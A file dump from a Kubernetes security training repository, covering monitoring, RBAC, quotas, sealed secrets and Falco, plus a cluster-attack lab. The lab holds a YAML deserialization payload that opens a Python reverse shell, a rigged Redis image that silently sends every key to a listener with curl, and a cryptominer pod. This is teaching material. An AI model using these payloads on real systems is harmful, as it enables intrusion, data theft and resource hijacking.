/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-1.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-10.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-11.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-12.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-12.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-13.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-13.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-2.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-3.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-4.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-5.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-6.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-7.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-8.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/Prometheus-Grafana/img/prometheus-grafana-9.png


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/prometheus.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Service
 3 | metadata:
 4 |   name: prometheus-service
 5 |   namespace: monitoring
 6 |   annotations:
 7 |       prometheus.io/scrape: 'true'
 8 |       prometheus.io/path:   /
 9 |       prometheus.io/port:   '8080'
10 |   
11 | spec:
12 |   selector: 
13 |     app: prometheus-server
14 |   type: NodePort  
15 |   ports:
16 |     - port: 8080
17 |       targetPort: 9090 
18 |       nodePort: 31000
19 | ---
20 | apiVersion: extensions/v1beta1
21 | kind: Deployment
22 | metadata:
23 |   name: prometheus-deployment
24 |   namespace: monitoring
25 | spec:
26 |   replicas: 1
27 |   template:
28 |     metadata:
29 |       labels:
30 |         app: prometheus-server
31 |     spec:
32 |       containers:
33 |         - name: prometheus
34 |           image: prom/prometheus:v2.2.1
35 |           args:
36 |             - "--config.file=/etc/prometheus/prometheus.yml"
37 |             - "--storage.tsdb.path=/prometheus/"
38 |           ports:
39 |             - containerPort: 9090
40 |           volumeMounts:
41 |             - name: prometheus-config-volume
42 |               mountPath: /etc/prometheus/
43 |             - name: prometheus-storage-volume
44 |               mountPath: /prometheus/
45 |       volumes:
46 |         - name: prometheus-config-volume
47 |           configMap:
48 |             defaultMode: 420
49 |             name: prometheus-server-conf
50 |   
51 |         - name: prometheus-storage-volume
52 |           emptyDir: {}
53 | 


--------------------------------------------------------------------------------
/Kubernetes/Prometheus-Grafana/wecare-k8.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Service
 3 | metadata:
 4 |   name: wecare-lb
 5 | spec:
 6 |   type: NodePort
 7 |   ports:
 8 |   - port: 80
 9 |     protocol: TCP
10 |     targetPort: 80
11 |   selector:
12 |     app: we-care
13 | ---
14 | apiVersion: extensions/v1beta1
15 | kind: Deployment
16 | metadata:
17 |   name: we-care
18 | spec:
19 |   replicas: 2
20 |   minReadySeconds: 15
21 |   strategy:
22 |     type: RollingUpdate
23 |     rollingUpdate:
24 |       maxUnavailable: 1
25 |       maxSurge: 1
26 |   template:
27 |     metadata:
28 |       labels:
29 |         app: we-care
30 |     spec:
31 |       containers:
32 |         - image: we45/wecare
33 |           imagePullPolicy: IfNotPresent
34 |           name: we-care
35 |           ports:
36 |             - containerPort: 80
37 | 
38 | 


--------------------------------------------------------------------------------
/Kubernetes/README.md:
--------------------------------------------------------------------------------
 1 | # [Kubernetes](README.md)
 2 | 
 3 | 
 4 | ##### Kubernetes - Attacking A Cluster
 5 | 
 6 | * [Cluster Attack](K8s-Cluster-Attack/README.md)
 7 | 
 8 | 
 9 | ##### Kubernetes - Role Based Access Control
10 | 
11 | * [Role Based Access Control](RoleBasedAccessControl/README.md)
12 | 
13 | 
14 | ##### Kubernetes - Pod Security Policy
15 | 
16 | * [Pod Security Policy](PodSecurityPolicy/README.md)
17 | 
18 | 
19 | ##### Kubernetes - Resource Quota
20 | 
21 | * [Resource Quota](ResourceQuota_Limit/README.md)
22 | 
23 | 
24 | ##### Kubernetes - Secrets
25 | 
26 | * [KubeSeal - Sealed Secrets](SealedSecrets/README.md)
27 | 
28 | * [Vault](Vault/README.md)
29 | 
30 | 
31 | ##### Kubernetes - Network Security Policy
32 | 
33 | * [Istio](Istio/README.md)
34 | 
35 | 
36 | ##### Kubernetes - Vulnerability Assessment
37 | 
38 | * [Kube-Sec](Kube-Sec/README.md)
39 | 
40 | * [Kube-Bench](Kube-Bench/README.md)
41 | 
42 | * [Kube-Hunter](Kube-Hunter/README.md)
43 | 
44 | 
45 | ##### Kubernetes - Monitoring and Logging
46 | 
47 | * [Prometheus-Grafana](Prometheus-Grafana/README.md)
48 | 
49 | * [Sysdig Falco](SysdigFalco/README.md)
50 | 


--------------------------------------------------------------------------------
/Kubernetes/ResourceQuota_Limit/README.md:
--------------------------------------------------------------------------------
 1 | # Resource Quotas and Limits
 2 | 
 3 | ##### Step 1:
 4 | 
 5 | * Navigate to the `ResourceQuota_Limit` directory
 6 | 
 7 | ```bash
 8 | cd /root/container_training/Kubernetes/ResourceQuota_Limit
 9 | ```
10 | 
11 | ##### Step 2:
12 | 
13 | * Create a pod on the `default` namespace.
14 | 
15 | ```bash
16 | kubectl create -f nginx-basic-limit.yaml
17 | ```
18 | 
19 | * Ensure that the `Status` of the pod is set to `Running`
20 | 
21 | ```bash
22 | kubectl get pods
23 | ```
24 | 
25 | ##### Step 3:
26 | 
27 | * Now test the memory consumption of the pod with the `stress` command:
28 | 
29 | * Run `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 100M`
30 | 
31 | * Stop it and run: `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 200M`
32 | 
33 | * Stop it and run `kubectl exec -it nginx-resource -- stress --cpu 1 --io 1 --vm 2 --vm-bytes 400M`
34 | 
35 | * It can be observed that the stress test fails with `exit code 1` at 400M because of the limit specified in Pod Spec. 
36 | 
37 | ##### Step 4:
38 | 
39 | * Delete the pod
40 | 
41 | ```bash
42 | kubectl delete -f nginx-basic-limit.yaml
43 | ```


--------------------------------------------------------------------------------
/Kubernetes/ResourceQuota_Limit/nginx-basic-limit.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: nginx-resource
 5 |   namespace: default
 6 | spec:
 7 |   containers:
 8 |   - image: sharathwe45/nginx-stress
 9 |     name: nginx
10 |     resources:
11 |       requests:
12 |         memory: 400Mi
13 |       limits:
14 |         memory: 500Mi


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/img/rbac-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-1.png


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/img/rbac-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-2.png


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/img/rbac-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-3.png


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/img/rbac-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-4.png


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/img/rbac-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-5.png


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/img/rbac-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-6.png


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/img/rbac-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-7.png


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/img/rbac-8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-8.png


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/img/rbac-9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/RoleBasedAccessControl/img/rbac-9.png


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/role-deployment-manager.yaml:
--------------------------------------------------------------------------------
 1 | kind: Role
 2 | apiVersion: rbac.authorization.k8s.io/v1beta1
 3 | metadata:
 4 |   namespace: restricted-namespace
 5 |   name: deployment-manager
 6 | rules:
 7 | - apiGroups: ["", "extensions", "apps"]
 8 |   resources: 
 9 |   - deployments
10 |   - replicasets
11 |   - pods
12 |   - services
13 |   verbs:
14 |   - get
15 |   - list
16 |   - watch
17 |   - create
18 |   - update
19 |   - patch
20 | 
21 | 


--------------------------------------------------------------------------------
/Kubernetes/RoleBasedAccessControl/rolebinding-deployment-manager.yaml:
--------------------------------------------------------------------------------
 1 | kind: RoleBinding
 2 | apiVersion: rbac.authorization.k8s.io/v1beta1
 3 | metadata:
 4 |   name: deployment-manager-binding
 5 |   namespace: restricted-namespace
 6 | subjects:
 7 | - kind: User
 8 |   name: restricteduser
 9 |   apiGroup: ""
10 | roleRef:
11 |   kind: Role
12 |   name: deployment-manager
13 |   apiGroup: ""
14 | 
15 | 


--------------------------------------------------------------------------------
/Kubernetes/SealedSecrets/README.md:
--------------------------------------------------------------------------------
 1 | # Kubernetes Sealed Secrets - Kubeseal
 2 | 
 3 | ##### Step 1:
 4 | 
 5 | * Navigate to the `SealedSecrets` directory
 6 | 
 7 | ```bash
 8 | cd /root/container_training/Kubernetes/SealedSecrets
 9 | ```
10 | 
11 | ##### Step 2:
12 | 
13 | * Ensure that K8s is running
14 | 
15 | ```bash
16 | kubectl get nodes
17 | ```
18 | 
19 | ##### Step 3:
20 | 
21 | * Create `SealedSecret` controller and Custom Resource Definition
22 | 
23 | ```bash
24 | kubectl create -f controller.yaml
25 | 
26 | kubectl create -f sealedsecret-crd.yaml
27 | ```
28 | 
29 | ##### Step 4:
30 | 
31 | * Seal the existing secret with `kubeseal`
32 | 
33 | ```bash
34 | kubeseal <mysecret.json >mysealedsecret.json
35 | ```
36 | 
37 | * Check the sealed-secret file 
38 | 
39 | ```bash
40 | cat mysealedsecret.json
41 | ```
42 | 
43 | ##### Step 5:
44 | 
45 | * Create the Sealed-Secret
46 | 
47 | ```bash
48 | kubectl create -f mysealedsecret.json
49 | ```
50 | 
51 | * Check the created Secret
52 | 
53 | ```bash
54 | kubectl get secrets
55 | ```
56 | 
57 | 
58 | ##### Step 6:
59 | 
60 | * Delete the created sealed secret 
61 | 
62 | ```bash
63 | kubectl delete -f mysealedsecret.json
64 | ```
65 | 
66 | 
67 | ##### Step 7:
68 | 
69 | * Stop SealedSecret Controller and Custom Resource Definition
70 | 
71 | ```bash
72 | kubectl delete -f controller.yaml
73 | 
74 | kubectl delete -f sealedsecret-crd.yaml
75 | ```


--------------------------------------------------------------------------------
/Kubernetes/SealedSecrets/mysecret.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "kind": "Secret",
 3 |     "apiVersion": "v1",
 4 |     "metadata": {
 5 |         "name": "mysecret",
 6 |         "creationTimestamp": null
 7 |     },
 8 |     "data": {
 9 |         "mysql_pass": "bm9uZW9meW9iaXpuZXNzMTIz",
10 |         "mysql_user": "cm9vdA=="
11 |     }
12 | }
13 | 


--------------------------------------------------------------------------------
/Kubernetes/SealedSecrets/sealedsecret-crd.yaml:
--------------------------------------------------------------------------------
 1 | ---
 2 | apiVersion: apiextensions.k8s.io/v1beta1
 3 | kind: CustomResourceDefinition
 4 | metadata:
 5 |   name: sealedsecrets.bitnami.com
 6 | spec:
 7 |   group: bitnami.com
 8 |   names:
 9 |     kind: SealedSecret
10 |     listKind: SealedSecretList
11 |     plural: sealedsecrets
12 |     singular: sealedsecret
13 |   scope: Namespaced
14 |   version: v1alpha1
15 | 


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/README.md:
--------------------------------------------------------------------------------
 1 | # Profiling and Logging - sysdig-falco
 2 | 
 3 | 
 4 | ##### Step 1: 
 5 | 
 6 | * Navigate to the `SysdigFalco` directory
 7 | 
 8 | ```bash
 9 | cd /root/container_training/Kubernetes/SysdigFalco
10 | ```
11 | 
12 | ##### Step 2: 
13 | 
14 | * Fetch the Server IP
15 | 
16 | ```bash
17 | serverip
18 | ```
19 | 
20 | ##### Step 3: 
21 | 
22 | * Edit `falco_daemonset.yaml` and update the IP in curl command on `line 21`.
23 | 
24 | ```bash
25 | sed -i -e 's/SERVER-IP/<serverip>/g' falco_daemonset.yaml
26 | ```
27 | 
28 | EXAMPLE:
29 | 
30 | ```yaml
31 | args: [ "/usr/bin/falco", "-pk", "-o", "json_output=true", "-o", "program_output.enabled=true", "-o",  "program_output.program=jq '{text: .output}' | curl -d @- -X POST http://192.168.1.1:9090"]
32 | ```
33 | 
34 | ##### Step 4: 
35 | 
36 | * Create the Falco daemonset
37 | 
38 | ```yaml
39 | kubectl create -f falco_daemonset.yaml
40 | ```
41 | 
42 | ##### Step 5:
43 | 
44 | * Create a Pod that intentionally generates malicious events
45 | 
46 | ```bash
47 | kubectl create -f falco-event-generator-deployment.yaml
48 | 
49 | kubectl get deployments
50 | 
51 | kubectl get pods
52 | ```
53 | 
54 | * Ensure that the `Status` of pods in `Running`
55 | 
56 | ##### Step 6:
57 | 
58 | 
59 | * Start tornado server to get the real-time logs of malicious events
60 | 
61 | ```bash
62 | ./tornado_server.py
63 | ```
64 | 
65 | * Stop the tornado server with `ctrl + c`
66 | 
67 | ##### Step 7:
68 | 
69 | * Stop the malicious event-generator and falco daemonset
70 | 
71 | ```bash
72 | kubectl delete -f falco-event-generator-deployment.yaml -f falco_daemonset.yaml
73 | ```
74 | 


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/__init__.py


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/falco-event-generator-deployment.yaml:
--------------------------------------------------------------------------------
 1 | apiVersion: extensions/v1beta1
 2 | kind: Deployment
 3 | metadata:
 4 |   name: falco-event-generator-deployment
 5 |   labels:
 6 |     name: falco-event-generator-deployment
 7 |     app: demo
 8 | spec:
 9 |   replicas: 1
10 |   template:
11 |     metadata:
12 |       labels:
13 |         app: falco-event-generator
14 |     spec:
15 |       containers:
16 |       - name: falco-event-generator
17 |         image: sysdig/falco-event-generator:latest
18 | 
19 | 


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/img/sysdig-falco-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-1.png


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/img/sysdig-falco-2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-2.png


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/img/sysdig-falco-3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-3.png


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/img/sysdig-falco-4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-4.png


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/img/sysdig-falco-5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-5.png


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/img/sysdig-falco-6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-6.png


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/img/sysdig-falco-7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/SysdigFalco/img/sysdig-falco-7.png


--------------------------------------------------------------------------------
/Kubernetes/SysdigFalco/tornado_server.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | 
 3 | import tornado.ioloop
 4 | import tornado.web
 5 | import pprint
 6 | 
 7 | 
 8 | class MyDumpHandler(tornado.web.RequestHandler):
 9 |     def post(self):
10 |         pprint.pprint(self.request)
11 |         pprint.pprint(self.request.body)
12 | 
13 | if __name__ == "__main__":
14 |     tornado.web.Application([(r"/.*", MyDumpHandler),]).listen(9090)
15 |     tornado.ioloop.IOLoop.instance().start()
16 | 
17 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/Initial-Setup/README.md:
--------------------------------------------------------------------------------
 1 | # K8s VM Initial Setup
 2 | 
 3 | ##### Step 1:
 4 | 
 5 | * Run the following command(s) to get the latest files
 6 | 
 7 | ```bash
 8 | cd /home/we45/container_training && git pull
 9 | 
10 | echo "hostname -I | cut -d' ' -f1" > /usr/local/bin/vmip && chmod +x /usr/local/bin/vmip
11 | 
12 | kubectl delete --all pods -n default
13 | ```
14 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/we45/container_training/6e72ba67bb85a52945bd35642f7f3e485060e7f6/Kubernetes/VM/K8s-Cluster-Attack/__init__.py


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/malicious-redis/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM redis:alpine
 2 | 
 3 | ENV CLIENTPORT 6379
 4 | ENV MASTERPORT 6379
 5 | ENV MASTERHOST 192.168.122.1
 6 | ENV CLIENTHOST 0.0.0.0
 7 | ENV APPENDFSYNC=everysec
 8 | ENV LISTENER_IP 192.168.122.1
 9 | ENV LISTENER_PORT 9080
10 | 
11 | ADD redis.conf /etc/redis.conf
12 | RUN chown redis:redis /etc/redis.conf
13 | RUN apk add curl
14 | COPY post_db.sh /
15 | RUN chmod +x /post_db.sh
16 | EXPOSE $CLIENTPORT
17 | 
18 | ADD docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh
19 | ENTRYPOINT ["docker-entrypoint.sh"]
20 | 
21 | CMD [ "redis-server","/etc/redis.conf" ]
22 | 
23 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/malicious-redis/docker-entrypoint.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | set -ex
 3 | 
 4 | ## from redis-3.2
 5 | sed -i "s/bind 127.0.0.1/bind $CLIENTHOST/g" /etc/redis.conf
 6 | 
 7 | ## redis port inside redis.conf
 8 | sed -i "s/port 6379/port $CLIENTPORT/g" /etc/redis.conf
 9 | # sed -i "s/# requirepass foobared/requirepass $REQUIREPASS/g" /etc/redis.conf
10 | # sed -i "s/# masterauth <master-password>/masterauth $REQUIREPASS/g" /etc/redis.conf
11 | 
12 | ## slaveof <masterip> <masterport> => slaveof $MASTERHOST $MASTERPORT
13 | if [ "$MASTERPORT" != "" ];then
14 | 	sed -i "s/# slaveof <masterip> <masterport>/slaveof $MASTERHOST $MASTERPORT/g" /etc/redis.conf
15 | fi
16 | 
17 | ## appendfsync everysec => appendfsync $APPENDFSYNC
18 | if [ "$APPENDFSYNC" != "" ];then
19 | 	sed -i "s/appendonly no/appendonly yes/g" /etc/redis.conf
20 | 	sed -i "s/appendfsync everysec/appendfsync $APPENDFSYNC/g" /etc/redis.conf
21 | fi
22 | 
23 | 
24 | # first arg is `-f` or `--some-option`
25 | # or first arg is `something.conf`
26 | if [ "${1#-}" != "$1" ] || [ "${1%.conf}" != "$1" ]; then
27 | 	set -- redis-server "$@"
28 | fi
29 | 
30 | # allow the container to be started with `--user`
31 | if [ "$1" = 'redis-server' -a "$(id -u)" = '0' ]; then
32 | 	nohup /post_db.sh > /dev/null 2>&1 &
33 | 	chown -R redis .
34 | 	exec su-exec redis "$@"
35 | fi
36 | 
37 | exec "$@"
38 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/malicious-redis/post_db.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/sh
 2 | while :; do
 3 |   sleep 10
 4 |   for each in $( redis-cli KEYS \* ); do
 5 |     result=$(redis-cli type $each)
 6 |     value=""
 7 |     if [ $result == "list" ]
 8 |     then
 9 |       value=$(redis-cli lrange $each 0 -1)
10 |     elif [ $result == "string" ]
11 |     then
12 |       value=$(redis-cli get $each)
13 |     elif [ $result == "set" ]
14 |     then
15 |       value=$(redis-cli smembers $each)
16 |     fi
17 |     curl -X POST -H "Content-Type: application/json; charset=UTF-8" -d "{\"key\": \"$each\", \"value\": \"$value\"}" http://$LISTENER_IP:$LISTENER_PORT
18 |     sleep 1
19 |   done
20 |   sleep 10
21 | done
22 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/malicious_pods/cminer.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "kind": "Pod",
 3 |     "apiVersion": "v1",
 4 |     "metadata": {
 5 |         "name": "cmine"
 6 |     },
 7 |     "spec": {
 8 |         "containers": [{
 9 |             "name": "cmine",
10 |             "image": "tseabra/coin-hive",
11 |             "command": ["./coin-hive","Ipf5vWwTX3gO6jd00mm1Wrg3SmNkLk0k"]
12 |         }]
13 |     }
14 | }


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/malicious_pods/malicious-redis-slave.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "kind": "Pod",
 3 |     "apiVersion": "v1",
 4 |     "metadata": {
 5 |         "name": "mal-redis"
 6 |     },
 7 |     "spec": {
 8 |         "containers": [{
 9 |             "name": "mal-redis",
10 |             "image": "we45/malicious-redis-slave",
11 |             "env": [
12 |               {
13 |                 "name": "MASTERHOST",
14 |                 "value": "127.0.0.1"
15 |               },
16 |               {
17 |                 "name": "MASTERPORT",
18 |                 "value": "6379"
19 |               },
20 |               {
21 |                 "name": "LISTENER_IP",
22 |                 "value": "192.168.1.5"
23 |               },
24 |               {
25 |                 "name": "LISTENER_PORT",
26 |                 "value": "3999"
27 |               }
28 |             ]
29 |         }]
30 |     }
31 | }


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/ngflask-redis-service.yml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Service
 3 | metadata:
 4 |   name: ngflask-redis-service
 5 | spec:
 6 |   ports:
 7 |   - port: 80
 8 |     protocol: TCP
 9 |   selector:
10 |     app: ngflask-redis
11 |   type: NodePort


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/ngflaskredis-deployment.yml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Pod
 3 | metadata:
 4 |   name: ngflask-redis
 5 |   labels:
 6 |     app: ngflask-redis
 7 | spec:
 8 |   containers:
 9 |     - name: nginx
10 |       image: nginx:1.11
11 |       ports:
12 |       - containerPort: 80
13 |       volumeMounts:
14 |         - mountPath: /etc/nginx/conf.d
15 |           name: config-volume
16 |     - name: redis
17 |       image: redis
18 |       ports:
19 |       - containerPort: 6379
20 |     - name: vulflask-redis
21 |       image: abhaybhargav/vul_flask_redis
22 |       imagePullPolicy: Always
23 |       env:
24 |         - name: REDIS_HOST
25 |           value: 127.0.0.1
26 |       ports:
27 |       - containerPort: 5000
28 |         name: vulflask-port
29 |   volumes:
30 |     - name: config-volume
31 |       configMap:
32 |         name: nginx-config
33 |         items:
34 |         - key: reverseproxy.conf
35 |           path: reverseproxy.conf
36 | 


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/payloads/reverse_shell.yml:
--------------------------------------------------------------------------------
1 | name: PayTM Bill payment 3
2 | reason: !!python/object/apply:os.system ["echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"VM-IP-Here\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' > shell.py && python shell.py &"]
3 | merchant: Hello World Traders
4 | amount: 12
5 | card: 4111111111111111


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/payloads/test_payment.yml:
--------------------------------------------------------------------------------
1 | name: PayTM Bill payment 5
2 | reason: !!python/object/apply:subprocess.check_output ["printenv"]
3 | merchant: Hello World Traders
4 | amount: 112
5 | card: 5111111111111111


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/redis-service.yml:
--------------------------------------------------------------------------------
 1 | apiVersion: v1
 2 | kind: Service
 3 | metadata:
 4 |   name: redis-service
 5 | spec:
 6 |   ports:
 7 |   - port: 6379
 8 |     protocol: TCP
 9 |   selector:
10 |     app: ngflask-redis
11 |   type: NodePort


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/reverseproxy.conf:
--------------------------------------------------------------------------------
 1 | server {
 2 |     listen  80;
 3 |     server_name localhost;
 4 | 
 5 |     location / {
 6 |         proxy_bind  127.0.0.1;
 7 |         proxy_pass  http://127.0.0.1:5000;
 8 |     }
 9 | 
10 |     error_page  500 502 503 504 /50x.html;
11 |     location = /50x.html {
12 |         root    /usr/share/nginx/html;
13 |     }
14 | }


--------------------------------------------------------------------------------
/Kubernetes/VM/K8s-Cluster-Attack/setup_flask_stack.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | kubectl create configmap nginx-config --from-file=reverseproxy.conf
3 | echo "Deploying Vul Flask Nginx Pod"
4 | kubectl create -f ngflaskredis-deployment.yml
